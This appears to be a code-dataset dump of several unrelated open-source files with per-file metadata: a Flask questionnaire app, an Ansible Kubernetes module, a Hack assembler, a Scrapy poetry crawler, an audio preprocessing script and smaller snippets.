This Manager class uses a protag shuffling algorithm
this manager class also merges buckets in a smart way"""
__slots__ = []
runnable = True
conservative = True
| 23.548387
| 71
| 0.747945
|
794dc76a76b28232977f2db994766a3d5589085d
| 104
|
py
|
Python
|
app/forms/user/__init__.py
|
jinxiu89/uwget
|
1827f882a091a68a77d00086968f695991e5278a
|
[
"MIT"
] | null | null | null |
app/forms/user/__init__.py
|
jinxiu89/uwget
|
1827f882a091a68a77d00086968f695991e5278a
|
[
"MIT"
] | 1
|
2021-06-02T00:29:20.000Z
|
2021-06-02T00:29:20.000Z
|
app/forms/user/__init__.py
|
jinxiu89/uwget
|
1827f882a091a68a77d00086968f695991e5278a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# _*_ coding:utf-8_*_
# author:jinxiu89@163.com
# create by thomas on 2019/6/23.
| 17.333333
| 32
| 0.692308
|
794dc79171a2ce2367be2ef9b7e3b8cfe9f83587
| 4,812
|
py
|
Python
|
app/main/views.py
|
neverland0/quickForm
|
431635326a1d8d66d4a9a7d47cdaa1d83ab0eec4
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
neverland0/quickForm
|
431635326a1d8d66d4a9a7d47cdaa1d83ab0eec4
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
neverland0/quickForm
|
431635326a1d8d66d4a9a7d47cdaa1d83ab0eec4
|
[
"MIT"
] | null | null | null |
from flask import render_template, jsonify, request
from . import main
import json,datetime
from flask_login import current_user, login_required
from ..models import Questionnaire, Item, Answer, Map, User
@main.route('/')
def index():
return render_template('index.html')
@main.route('/design', methods=['GET', 'POST'])
@login_required
def design():
if request.method == 'POST':
a = request.get_json(force = True)
title = a["title"]
if(current_user.is_administrator()):
tag = a["tag"]
timestamp = datetime.datetime.now()
user_id = current_user.get_id()
items = a["items"]
q = Questionnaire()
if(title != ""):
q.title = title
if(current_user.is_administrator()):
q.tag = tag
q.user_id = user_id
q.timestamp = timestamp
q.save()
for item in items:
i = Item()
question = item["question"]
no = item["no"]
kind = item["kind"]
need = item["need"]
i.question = question
i.no = no
i.kind = kind
i.need = need
choice = item["choice"]
for c in choice:
i.choice.append(c)
i.questionnaire = q
i.save()
return jsonify(result=str(q.id))
return render_template('design.html',id="")
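# For reference, a hypothetical JSON body for POST /design matching the fields
# parsed above ("tag" is only read for administrators):
#
# example_payload = {
#     "title": "Course feedback",
#     "tag": "teaching",
#     "items": [{
#         "question": "How was the pace?",
#         "no": 1,
#         "kind": "radio",
#         "need": True,
#         "choice": ["Too slow", "Just right", "Too fast"],
#     }],
# }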
@main.route('/old/p/<str>')
@login_required
def old(str):
user_id = current_user.get_id()
q = Questionnaire.objects(user_id=user_id).order_by("-timestamp").all()
return render_template('old.html',q=q, str=str)
@main.route('/old/edit/<id>')
def edit(id):
q = Questionnaire.objects(id=id).first()
i = Item.objects(questionnaire=id).order_by("+no").all()
return render_template('edit.html',q=q, i=i)
@main.route('/old/delete', methods=['GET', 'POST'])
def delete():
a = request.get_json(force = True)
id = a["id"]
q = Questionnaire.objects(id = id).first()
i = Item.objects(questionnaire=id).all()
a = Answer.objects(questionnaire = id).all()
q.delete()
for item in i:
item.delete()
for answer in a:
answer.delete()
return jsonify(a=1)
@main.route('/old/<id>')
def detail(id):
q = Questionnaire.objects(id=id).first()
i = Item.objects(questionnaire=id).order_by("+no").all()
count = 0
a = Answer.objects(questionnaire = q.id).count()
if(a):
count = a
a = Answer.objects(questionnaire = q.id).all()
answer_list = []
for answer in a:
answer_dict = {}
answer_dict['timestamp'] = answer.timestamp
answer_dict['content'] = []
for x in range(len(i)):
answer_item = {}
answer_item['question'] = i[x].question
answer_item['no'] = i[x].no
answer_item['kind'] = i[x].kind
answer_item['choice'] = []
for choice in i[x].choice:
tem = answer.map_list[x].v_choice
if(choice in tem):
choice_add=(choice,True)
else:
choice_add=(choice,False)
answer_item['choice'].append(choice_add)
answer_dict['content'].append(answer_item)
answer_list.append(answer_dict)
return render_template('detail.html',x=count, a=a, q=q, i=i, answer_list=answer_list)
@main.route('/chart')
def chart():
id = request.args.get('id')
q = Questionnaire.objects(id=id).first()
i = Item.objects(questionnaire=id).all()
L = []
for item in i:
d = {}
for choice in item.choice:
d[choice] = 0
for v in item.vote:
d[v]=d[v]+1
L.append(d)
return json.dumps(L)
@main.route('/create', methods=['GET', 'POST'])
def create():
a = request.get_json(force = True)
title = a["title"]
timestamp = datetime.datetime.now()
user_id = current_user.get_id()
items = a["items"]
q = Questionnaire()
if(title != ""):
q.title = title
q.user_id = user_id
q.timestamp = timestamp
q.save()
for item in items:
i = Item()
question = item["question"]
no = item["no"]
kind = item["kind"]
i.question = question
i.no = no
i.kind = kind
choice = item["choice"]
for c in choice:
i.choice.append(c)
i.questionnaire = q
i.save()
return jsonify(result=str(q.id))
@main.route('/example')
@login_required
def example():
u = User.query.all()
i = Item.objects().all()
for user in u:
if user.is_administrator():
id = str(user.id)
q = Questionnaire.objects(user_id=id).all()
return render_template('fromExample.html',q=q, i=i)
| 28.814371
| 89
| 0.554863
|
794dc8e0ac2faec7eabae56260b6fb42ff259ab0
| 87
|
py
|
Python
|
plugins/microsoft_atp/komand_microsoft_atp/actions/get_security_recommendations/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/microsoft_atp/komand_microsoft_atp/actions/get_security_recommendations/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/microsoft_atp/komand_microsoft_atp/actions/get_security_recommendations/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .action import GetSecurityRecommendations
| 29
| 46
| 0.816092
|
794dca0896f9e27bdd1c6e5d6b022448cdf74b5d
| 53
|
py
|
Python
|
good/expIntegers.py
|
Alberto42/Interpreter
|
a56c4d905672572734a8470ef607b66727489f15
|
[
"BSD-3-Clause"
] | null | null | null |
good/expIntegers.py
|
Alberto42/Interpreter
|
a56c4d905672572734a8470ef607b66727489f15
|
[
"BSD-3-Clause"
] | null | null | null |
good/expIntegers.py
|
Alberto42/Interpreter
|
a56c4d905672572734a8470ef607b66727489f15
|
[
"BSD-3-Clause"
] | null | null | null |
x = 1 + 2
y = 2 * 2
z = 5 - 3
v = 5 / 3
a = x + y + z
| 10.6
| 13
| 0.301887
|
794dcba2606c5ac6d956b74b840e581c64f592b4
| 4,742
|
py
|
Python
|
library/k8s_v1beta1_token_review.py
|
ansible/ansible-kubernetes-modules-
|
b5c7a85de6173c2f6141f19a130ff37b1fdafbf6
|
[
"Apache-2.0"
] | 91
|
2017-03-23T03:46:43.000Z
|
2021-06-03T18:30:03.000Z
|
library/k8s_v1beta1_token_review.py
|
ansible/ansible-kubernetes-modules-
|
b5c7a85de6173c2f6141f19a130ff37b1fdafbf6
|
[
"Apache-2.0"
] | 28
|
2017-06-02T18:21:13.000Z
|
2020-01-29T22:33:05.000Z
|
library/k8s_v1beta1_token_review.py
|
ansible/ansible-kubernetes-modules-
|
b5c7a85de6173c2f6141f19a130ff37b1fdafbf6
|
[
"Apache-2.0"
] | 40
|
2017-03-23T03:46:45.000Z
|
2022-02-01T14:29:21.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from ansible.module_utils.k8s_common import KubernetesAnsibleModule, KubernetesAnsibleException
DOCUMENTATION = '''
module: k8s_v1beta1_token_review
short_description: Kubernetes TokenReview
description:
- Manage the lifecycle of a token_review object. Supports check mode, and attempts
  to be idempotent.
version_added: 2.3.0
author: OpenShift (@openshift)
options:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource that may
be set by external tools to store and retrieve arbitrary metadata. They are
not queryable and should be preserved when modifying objects.
type: dict
api_key:
description:
- Token used to connect to the API.
cert_file:
description:
- Path to a certificate used to authenticate with the API.
type: path
context:
description:
- The name of a context found in the Kubernetes config file.
debug:
description:
- Enable debug output from the OpenShift helper. Logging info is written to KubeObjHelper.log
default: false
type: bool
force:
description:
- If set to C(True), and I(state) is C(present), an existing object will updated,
and lists will be replaced, rather than merged.
default: false
type: bool
host:
description:
  - Provide a URL for accessing the Kubernetes API.
key_file:
description:
- Path to a key file used to authenticate with the API.
type: path
kubeconfig:
description:
- Path to an existing Kubernetes config file. If not provided, and no other connection
options are provided, the openshift client will attempt to load the default
configuration file from I(~/.kube/config.json).
type: path
labels:
description:
- Map of string keys and values that can be used to organize and categorize (scope
and select) objects. May match selectors of replication controllers and services.
type: dict
name:
description:
- Name must be unique within a namespace. Is required when creating resources,
although some resources may allow a client to request the generation of an appropriate
name automatically. Name is primarily intended for creation idempotence and
configuration definition. Cannot be updated.
namespace:
description:
  - Namespace defines the space within which each name must be unique. An empty namespace
is equivalent to the "default" namespace, but "default" is the canonical representation.
Not all objects are required to be scoped to a namespace - the value of this
field for those objects will be empty. Must be a DNS_LABEL. Cannot be updated.
password:
description:
- Provide a password for connecting to the API. Use in conjunction with I(username).
spec_token:
description:
- Token is the opaque bearer token.
aliases:
- token
ssl_ca_cert:
description:
- Path to a CA certificate used to authenticate with the API.
type: path
username:
description:
- Provide a username for connecting to the API.
verify_ssl:
description:
- Whether or not to verify the API server's SSL certificates.
type: bool
requirements:
- kubernetes == 4.0.0
'''
EXAMPLES = '''
'''
RETURN = '''
api_version:
description: Requested API version
type: string
token_review:
type: complex
returned: on success
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation of an object.
Servers should convert recognized schemas to the latest internal value, and
may reject unrecognized values.
type: str
kind:
description:
- Kind is a string value representing the REST resource this object represents.
Servers may infer this from the endpoint the client submits requests to. Cannot
be updated. In CamelCase.
type: str
metadata:
description: []
type: complex
spec:
description:
- Spec holds information about the request being evaluated
type: complex
status:
description:
- Status is filled in by the server and indicates whether the request can be
authenticated.
type: complex
'''
def main():
try:
module = KubernetesAnsibleModule('token_review', 'v1beta1')
except KubernetesAnsibleException as exc:
# The helper failed to init, so there is no module object. All we can do is raise the error.
raise Exception(exc.message)
try:
module.execute_module()
except KubernetesAnsibleException as exc:
module.fail_json(msg="Module failed!", error=str(exc))
if __name__ == '__main__':
main()
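# A hypothetical playbook task for this module (the EXAMPLES block above is
# empty in the source; field names follow the documented options):
#
# - name: Review a bearer token
#   k8s_v1beta1_token_review:
#     host: https://k8s.example.com
#     api_key: "{{ admin_token }}"
#     spec_token: "{{ token_to_check }}"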
| 32.040541
| 100
| 0.706031
|
794dcc0d5bad5987a8c5aace14fd42c9321e5a5b
| 37
|
py
|
Python
|
tests/commands/iot/__init__.py
|
epenet/aioguardian
|
2050c83ea746f831872f62569eecd85226112353
|
[
"MIT"
] | 1
|
2020-06-26T05:25:34.000Z
|
2020-06-26T05:25:34.000Z
|
tests/commands/iot/__init__.py
|
epenet/aioguardian
|
2050c83ea746f831872f62569eecd85226112353
|
[
"MIT"
] | 79
|
2020-04-15T00:35:44.000Z
|
2022-03-31T10:07:58.000Z
|
tests/commands/iot/__init__.py
|
epenet/aioguardian
|
2050c83ea746f831872f62569eecd85226112353
|
[
"MIT"
] | 6
|
2020-09-04T16:06:18.000Z
|
2022-03-30T18:42:37.000Z
|
"""Define tests for IOT commands."""
| 18.5
| 36
| 0.675676
|
794dcc36fb59afb3ea020bbbd423fde8116dedf6
| 9,327
|
py
|
Python
|
preprocess.py
|
c1a1o1/ByteSing-tf1.10
|
5ad0c76bd5bae8515108bd1811fcd589ac46300a
|
[
"MIT"
] | 2
|
2022-01-09T13:32:07.000Z
|
2022-02-01T06:33:39.000Z
|
preprocess.py
|
c1a1o1/ByteSing-tf1.10
|
5ad0c76bd5bae8515108bd1811fcd589ac46300a
|
[
"MIT"
] | null | null | null |
preprocess.py
|
c1a1o1/ByteSing-tf1.10
|
5ad0c76bd5bae8515108bd1811fcd589ac46300a
|
[
"MIT"
] | 1
|
2021-12-29T08:52:36.000Z
|
2021-12-29T08:52:36.000Z
|
# coding:utf-8
import argparse
import os
from multiprocessing import cpu_count
import wave
from pydub import AudioSegment
import music21 as m21
from concurrent.futures import ProcessPoolExecutor
import numpy as np
from functools import partial
from tqdm import tqdm
from myData import pinyin
from datasets import audio
from hparams import hparams
def get_second_part_wave(wav, start_time, end_time, hparams):
start_time = int(start_time * 1000)
end_time = int(end_time * 1000)
sentence = wav[start_time: end_time]
temp = sentence.export('temp.wav', format="wav")
sentence = audio.load_wav('temp.wav', sr=hparams.sample_rate)
return sentence
def get_music_score(metadata_filename):
# 处理乐谱,输出每个音素[持续时长,midi,因素类型,音素]
lines = []
score = m21.converter.parse(metadata_filename)
part = score.parts.flat
for i in range(len(part.notesAndRests)):
event = part.notesAndRests[i]
if isinstance(event, m21.note.Note):
duration = event.seconds
midi = event.pitch.midi
if len(event.lyrics) > 0:
token = event.lyrics[1].text+'3'
token = pinyin.split_pinyin(token)
if token[0] != '':
lines.append([duration, midi, 0, token[0]])
lines.append([duration, midi, 1, token[1]])
elif token[1] != '':
lines.append([duration, midi, 2, token[1]])
else:
temp = lines[-1]
lines[-1][0] = lines[-1][0] + duration
elif isinstance(event, m21.note.Rest):
duration = event.seconds
midi = 0
token = 'sp'
if lines[-1][-1] != 'sp':
lines.append([duration, midi, 2, token])
else:
lines[-1][0] = lines[-1][0] + duration
return lines
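# For reference, the rows returned above have the shape
# [duration_seconds, midi_pitch, phoneme_type, phoneme], where type 0 is a
# syllable initial, type 1 its final (same note), and type 2 a standalone
# final or the rest token 'sp'. A hypothetical example:
#   [0.50, 62, 0, 'zh'], [0.50, 62, 1, 'ong3'], [0.25, 0, 2, 'sp']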
def get_phoneme_duration(metadata_filename):
# 处理音频时长标注信息,返回[开始时间,结束时间,对应音素]
with open(metadata_filename, encoding='utf-8') as f:
i = 0
j = 0
durationOutput = []
for line in f:
if j != 15:
j = j+1
continue
line = line.split('\n')[0]
if i == 0:
startTime = float(line)
i = i+1
elif i == 1:
endTime = float(line)
i = i+1
else:
i = 0
temp = line.split('"')[1]
if temp == 'sil' or temp == 'pau':
temp = 'sp'
if j == 15:
durationOutput.append([startTime, endTime, temp])
else:
if durationOutput[-1][2] != temp:
durationOutput.append([startTime, endTime, temp])
else:
durationOutput[-1][1] = endTime
return durationOutput
def audio_process_utterance(mel_dir, linear_dir, wav_dir, duration_dir, score_dir, index, wav, durations, scores, hparams):
"""
Preprocesses a single utterance wav/text pair
this writes the mel scale spectogram to disk and return a tuple to write
to the train.txt file
Args:
- mel_dir: the directory to write the mel spectograms into
- linear_dir: the directory to write the linear spectrograms into
- wav_dir: the directory to write the preprocessed wav into
- index: the numeric index to use in the spectogram filename
- wav_path: path to the audio file containing the speech input
- hparams: hyper parameters
Returns:
- A tuple: (audio_filename, mel_filename, linear_filename, score_filename, duration_filename, time_steps, mel_frames)
"""
#rescale wav
if hparams.rescale:
wav = wav / np.abs(wav).max() * hparams.rescaling_max
#Get spectrogram from wav
ret = audio.wav2spectrograms(wav, hparams)
if ret is None:
return None
out = ret[0]
mel_spectrogram = ret[1]
linear_spectrogram = ret[2]
time_steps = ret[3]
mel_frames = ret[4]
# Write the spectrogram and audio to disk
audio_filename = 'audio-{}.npy'.format(index)
mel_filename = 'mel-{}.npy'.format(index)
linear_filename = 'linear-{}.npy'.format(index)
duration_filename = 'duration-{}.npy'.format(index)
score_filename = 'score-{}.npy'.format(index)
np.save(os.path.join(wav_dir, audio_filename), out.astype(np.float32), allow_pickle=False)
np.save(os.path.join(mel_dir, mel_filename), mel_spectrogram.T, allow_pickle=False)
np.save(os.path.join(linear_dir, linear_filename), linear_spectrogram.T, allow_pickle=False)
np.save(os.path.join(duration_dir, duration_filename), durations, allow_pickle=False)
np.save(os.path.join(score_dir, score_filename), scores, allow_pickle=False)
# Return a tuple describing this training example
return (audio_filename, mel_filename, linear_filename, duration_filename, score_filename, time_steps, mel_frames)
def build_from_path(hparams, input_dir, mel_dir, linear_dir, wav_dir, score_dir, duration_dir, n_jobs=12, tqdm=lambda x: x):
"""
Args:
- hparams: hyper parameters
        - input_dir: input directory that contains the files to preprocess
- mel_dir: output directory of the preprocessed speech mel-spectrogram dataset
- linear_dir: output directory of the preprocessed speech linear-spectrogram dataset
- wav_dir: output directory of the preprocessed speech audio dataset
- n_jobs: Optional, number of worker process to parallelize across
- tqdm: Optional, provides a nice progress bar
Returns:
- A list of tuple describing the train examples. this should be written to train.txt
"""
    # We use ProcessPoolExecutor to parallelize across processes; this is just
    # for optimization purposes and can be omitted
executor = ProcessPoolExecutor(max_workers=n_jobs)
scores = get_music_score(os.path.join(input_dir, '001.musicxml'))
durations = get_phoneme_duration(os.path.join(input_dir, '001.interval'))
song = AudioSegment.from_wav(os.path.join(input_dir, '001.wav'))
futures = []
index = 1
sentence_duration = []
score_index = -1
for i in range(len(scores)):
sentence_duration.append(durations[i])
if durations[i][2] == 'sp':
sentence_score = []
wav = get_second_part_wave(song, sentence_duration[0][0], sentence_duration[-1][0], hparams)
while True:
score_index += 1
sentence_score.append(scores[score_index])
if scores[score_index][3] == 'sp':
futures.append(executor.submit(partial(audio_process_utterance, mel_dir, linear_dir, wav_dir,\
duration_dir, score_dir, index, wav, sentence_duration, sentence_score, hparams)))
# futures.append(audio_process_utterance(mel_dir, linear_dir, wav_dir,\
# duration_dir, score_dir, index, wav, sentence_duration, sentence_score, hparams))
index += 1
sentence_duration = []
break
return [future.result() for future in tqdm(futures) if future.result() is not None]
# return futures
def write_metadata(metadata, out_dir):
with open(os.path.join(out_dir, 'train.txt'), 'w', encoding='utf-8') as f:
for m in metadata:
f.write('|'.join([str(x) for x in m]) + '\n')
mel_frames = sum([int(m[6]) for m in metadata])
timesteps = sum([int(m[5]) for m in metadata])
sr = hparams.sample_rate
hours = timesteps / sr / 3600
print('Write {} utterances, {} mel frames, {} audio timesteps, ({:.2f} hours)'.format(
len(metadata), mel_frames, timesteps, hours))
print('Max mel frames length: {}'.format(max(int(m[6]) for m in metadata)))
print('Max audio timesteps length: {}'.format(max(m[5] for m in metadata)))
def main():
print('initializing preprocessing..')
parser = argparse.ArgumentParser()
parser.add_argument('--base_dir', default='/datapool/home/ywy19/singing-synthesis/ByteSing')
parser.add_argument('--hparams', default='',
help='Hyperparameter overrides as a comma-separated list of name=value pairs')
parser.add_argument('--dataset', default='myData')
parser.add_argument('--output', default='training_data')
parser.add_argument('--n_jobs', type=int, default=cpu_count())
args = parser.parse_args()
modified_hp = hparams.parse(args.hparams)
# Prepare directories
in_dir = os.path.join(args.base_dir, args.dataset)
out_dir = os.path.join(args.base_dir, args.output)
mel_dir = os.path.join(out_dir, 'mels')
wav_dir = os.path.join(out_dir, 'audio')
lin_dir = os.path.join(out_dir, 'linear')
dur_dir = os.path.join(out_dir, 'duration')
sco_dir = os.path.join(out_dir, 'score')
os.makedirs(mel_dir, exist_ok=True)
os.makedirs(wav_dir, exist_ok=True)
os.makedirs(lin_dir, exist_ok=True)
os.makedirs(dur_dir, exist_ok=True)
os.makedirs(sco_dir, exist_ok=True)
# Process dataset
metadata = []
metadata = build_from_path(modified_hp, in_dir, mel_dir, lin_dir, wav_dir, sco_dir, dur_dir, args.n_jobs, tqdm=tqdm)
# Write metadata to 'train.txt' for training
write_metadata(metadata, out_dir)
if __name__ == '__main__':
main()
| 40.202586
| 124
| 0.637397
|
794dcc9da123fd3026508cb55b125c9cb70768e0
| 3,117
|
py
|
Python
|
ganjoor/spiders/khaghani/divankh/scrapyghasidekh.py
|
amirmasoud/ganjoor-crawler
|
a86fe379955ce854765086ab7ba0a78513d052bd
|
[
"MIT"
] | null | null | null |
ganjoor/spiders/khaghani/divankh/scrapyghasidekh.py
|
amirmasoud/ganjoor-crawler
|
a86fe379955ce854765086ab7ba0a78513d052bd
|
[
"MIT"
] | null | null | null |
ganjoor/spiders/khaghani/divankh/scrapyghasidekh.py
|
amirmasoud/ganjoor-crawler
|
a86fe379955ce854765086ab7ba0a78513d052bd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
class scrapyghasidekhSpider(scrapy.Spider):
name = "scrapyghasidekh"
allowed_domains = ["ganjoor.net"]
if 224 == 1:
start_urls = ["https://ganjoor.net/khaghani/divankh/ghasidekh/sh"]
else:
start_urls = ["https://ganjoor.net/khaghani/divankh/ghasidekh/sh" + "1"]
order = 1
def parse(self, response):
index = 0
sh = dict()
sh["type"] = "ghaside"
sh["text"] = dict()
for i, poem in enumerate(response.css("div.poem>article>div")):
if poem.css("p:first-child::text").extract_first() is None:
continue
if index == 0:
if 3 == 1:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(poem.css("div.m1>p::text").extract()).strip()
elif 3 == 2:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(poem.css("div.m2>p::text").extract()).strip()
elif 3 == 3:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(response.css("div.poem>article>h2>a::text").extract()).strip() + ': ' + ''.join(poem.css("div.m1>p::text").extract()).strip()
elif 3 == 4:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(response.css("div.poem>article>h2>a::text").extract()).strip() + ': ' + ''.join(poem.css("div.m2>p::text").extract()).strip()
else:
sh["title"] = response.css("div.poem>article>h2>a::text").extract_first()
if len(poem.css("div.m1>p")) == 1:
if poem.css("div.b"):
sh["text"][index] = dict([
("m1", ''.join(poem.css("div.m1>p::text").extract()).strip()),
("m2", ''.join(poem.css("div.m2>p::text").extract()).strip()),
])
else:
sh["text"][index] = dict([
("t1", ''.join(poem.css("p:first-child::text").extract()).strip()),
("t2", ''.join(poem.css("p:last-child::text").extract()).strip()),
])
else:
if poem.css("div.b2"):
sh["text"][index] = dict([
("t1", ''.join(poem.css("p:first-child::text").extract()).strip()),
("t2", ''.join(poem.css("p:last-child::text").extract()).strip()),
])
else:
sh['text'][index] = dict([
('p', ''.join(poem.css('p:first-child::text').extract()).strip())
])
index = index + 1
sh["order"] = self.order
self.order = self.order + 1
yield sh
# next_page = response.css("div.navigation>div.navleft>a::attr(href)").extract_first()
if self.order < (224 + 1):
next_page = response.urljoin("https://ganjoor.net/khaghani/divankh/ghasidekh/sh" + str(self.order))
yield scrapy.Request(next_page, callback=self.parse)
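# Shape of each item yielded by parse() (hedged example):
# {"type": "ghaside", "order": 1, "title": "... شماره 1 - ...",
#  "text": {0: {"m1": "<first hemistich>", "m2": "<second hemistich>"}, ...}}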
| 51.098361
| 210
| 0.45717
|
794dcd9fe4c4a500ad2bd233a27fda8949c6373a
| 887
|
py
|
Python
|
socketshark/constants.py
|
Play2Live/socketshark
|
9b1e40654bf629c593079fb44c548911d4c864af
|
[
"MIT"
] | 70
|
2017-06-15T01:30:56.000Z
|
2022-03-18T19:35:26.000Z
|
socketshark/constants.py
|
Play2Live/socketshark
|
9b1e40654bf629c593079fb44c548911d4c864af
|
[
"MIT"
] | 40
|
2017-08-03T20:54:43.000Z
|
2021-12-06T10:43:53.000Z
|
socketshark/constants.py
|
Play2Live/socketshark
|
9b1e40654bf629c593079fb44c548911d4c864af
|
[
"MIT"
] | 7
|
2018-10-03T10:00:10.000Z
|
2021-11-05T07:14:33.000Z
|
# Authentication method to use if "method" param is omitted.
DEFAULT_AUTH_METHOD = 'ticket'
# Max string length of the "event" parameter.
MAX_EVENT_LENGTH = 40
# General event errors
ERR_INVALID_EVENT = 'Messages must be JSON and contain an event field.'
ERR_UNHANDLED_EXCEPTION = 'Unhandled exception.'
ERR_EVENT_NOT_FOUND = 'Event not found.'
ERR_SERVICE_UNAVAILABLE = 'Service unavailable.'
# Authentication & authorization
ERR_AUTH_UNSUPPORTED = 'Authentication method unsupported.'
ERR_UNAUTHORIZED = 'Unauthorized.'
ERR_NEEDS_TICKET = 'Must specify ticket.'
ERR_AUTH_FAILED = 'Authentication failed.'
ERR_AUTH_REQUIRED = 'Authentication required.'
# Subscriptions
ERR_INVALID_SUBSCRIPTION_FORMAT = 'Invalid subscription format.'
ERR_INVALID_SERVICE = 'Invalid service.'
ERR_ALREADY_SUBSCRIBED = 'Already subscribed.'
ERR_SUBSCRIPTION_NOT_FOUND = 'Subscription does not exist.'
| 35.48
| 71
| 0.808343
|
794dcdf5698e7a57b8c61f87d36df8e54a5be188
| 2,968
|
py
|
Python
|
06/Python/assembler.py
|
MrEbbinghaus/nand2tetris
|
1d01969761dbca674b5b31238253ce56b632bfe9
|
[
"MIT"
] | null | null | null |
06/Python/assembler.py
|
MrEbbinghaus/nand2tetris
|
1d01969761dbca674b5b31238253ce56b632bfe9
|
[
"MIT"
] | null | null | null |
06/Python/assembler.py
|
MrEbbinghaus/nand2tetris
|
1d01969761dbca674b5b31238253ce56b632bfe9
|
[
"MIT"
] | null | null | null |
#python3
from sys import argv
from os import path
from re import sub
memoryCounter = 16
symbolTable = {
"SCREEN":int("4000",16),
"SP":0,
"LCL":1,
"ARG":2,
"THIS":3,
"THAT":4,
"KBD":int("6000",16),
}
jmpTable = {
"null":"000",
"JGT":"001",
"JEQ":"010",
"JGE":"011",
"JLT":"100",
"JNE":"101",
"JLE":"110",
"JMP":"111"
}
cmdTable = {
"0":"101010",
"1":"111111",
"-1":"111010",
"D":"001100",
"A":"110000",
"!D":"001101",
"!A":"110001",
"-D":"001111",
"-A":"110011",
"D+1":"011111",
"A+1":"110111",
"D-1":"001110",
"A-1":"110010",
"D+A":"000010",
"D-A":"010011",
"A-D":"000111",
"D&A":"000000",
"D|A":"010101"
}
def buildDict(lines):
for x in range(0,16):
symbolTable["R"+str(x)] = x
lineCounter = 0
for line in lines:
if line[0] == '(' :
line = line.strip('()')
if line not in symbolTable:
symbolTable[line] = lineCounter
else:
lineCounter += 1
def IToXbitBin(y, bit):
ret = bin( int(y) )[2:]
x = bit - len(ret)
while x > 0 :
ret = '0' + ret
x -= 1
return ret
def parseA(line):
ret = "0"
if line[1].isdigit():
ret += IToXbitBin(line[1:], 15)
else:
if line[1:] in symbolTable.keys():
value = symbolTable[line[1:]]
ret += IToXbitBin(value, 15)
else:
global memoryCounter
while( memoryCounter in symbolTable.values() and memoryCounter < int("4000",16) ):
memoryCounter += 1
symbolTable[ line[1:] ] = memoryCounter
ret += IToXbitBin(memoryCounter,15)
return ret + '\n'
def parseDest(i):
dest = ""
if 'A' in i:
dest += '1'
else:
dest += '0'
if 'D' in i:
dest += '1'
else:
dest += '0'
if 'M' in i:
dest += '1'
else:
dest += '0'
return dest
def parseC(line):
ret = "111"
dest = "000"
jmp = "000"
a = "0"
if ';' in line:
sp_line = line.split(';')
jmp = jmpTable[sp_line[1]]
line = sp_line[0]
if '=' in line:
sp_line = line.split('=')
dest = parseDest( sp_line[0] )
if 'M' in sp_line[1]:
a = "1"
cmd_line = sp_line[1].replace("M","A")
cmd = cmdTable[ cmd_line ]
else:
cmd = cmdTable[ line ]
return ret + a + cmd + dest + jmp + '\n'
def parse(line):
if line[0] == '@':
return parseA(line)
else:
return parseC(line)
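# Worked examples (assuming the standard Hack instruction encoding):
#   parse("@2")    -> "0000000000000010\n"   A-instruction, value 2
#   parse("D=A")   -> "1110110000010000\n"   comp=A (110000), dest=D (010)
#   parse("0;JMP") -> "1110101010000111\n"   comp=0 (101010), jump always (111)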
# start!
if len(argv) > 1:
in_file = argv[1]
output_name = path.splitext(in_file)[0] + ".hack"
if len(argv) > 2:
output_name = argv[2]
else:
print( "Input format wrong!\n"+
"Correct input format (output optional): \n"+
"python3 assembler.py input (output)")
exit(1)
file_input = open (in_file, "r")
lines = file_input.readlines()
lines = map (lambda line: sub(r"//.*","", line), lines) #clear comments
lines = list ( filter(None, map(str.strip, lines) ) ) #clear whitespace & empty lines
file_input.close()
buildDict(lines)
lines = filter(lambda line: not(line.startswith("(")), lines) #clear lables
out_lines = list( map(parse, lines) )
file_output = open( output_name, "w")
file_output.writelines( out_lines )
file_output.close()
print ( "Done!" )
| 16.218579
| 85
| 0.583895
|
794dceadb1e9891584adab104b35a53490cb3374
| 3,055
|
py
|
Python
|
tools/linux-tick-processor.py
|
martine/v8c
|
222c7cd957ea7be31701172e8f66e4c31d0aa3f4
|
[
"BSD-3-Clause-Clear"
] | 3
|
2015-01-01T16:04:49.000Z
|
2016-05-08T13:54:15.000Z
|
tools/linux-tick-processor.py
|
martine/v8c
|
222c7cd957ea7be31701172e8f66e4c31d0aa3f4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tools/linux-tick-processor.py
|
martine/v8c
|
222c7cd957ea7be31701172e8f66e4c31d0aa3f4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
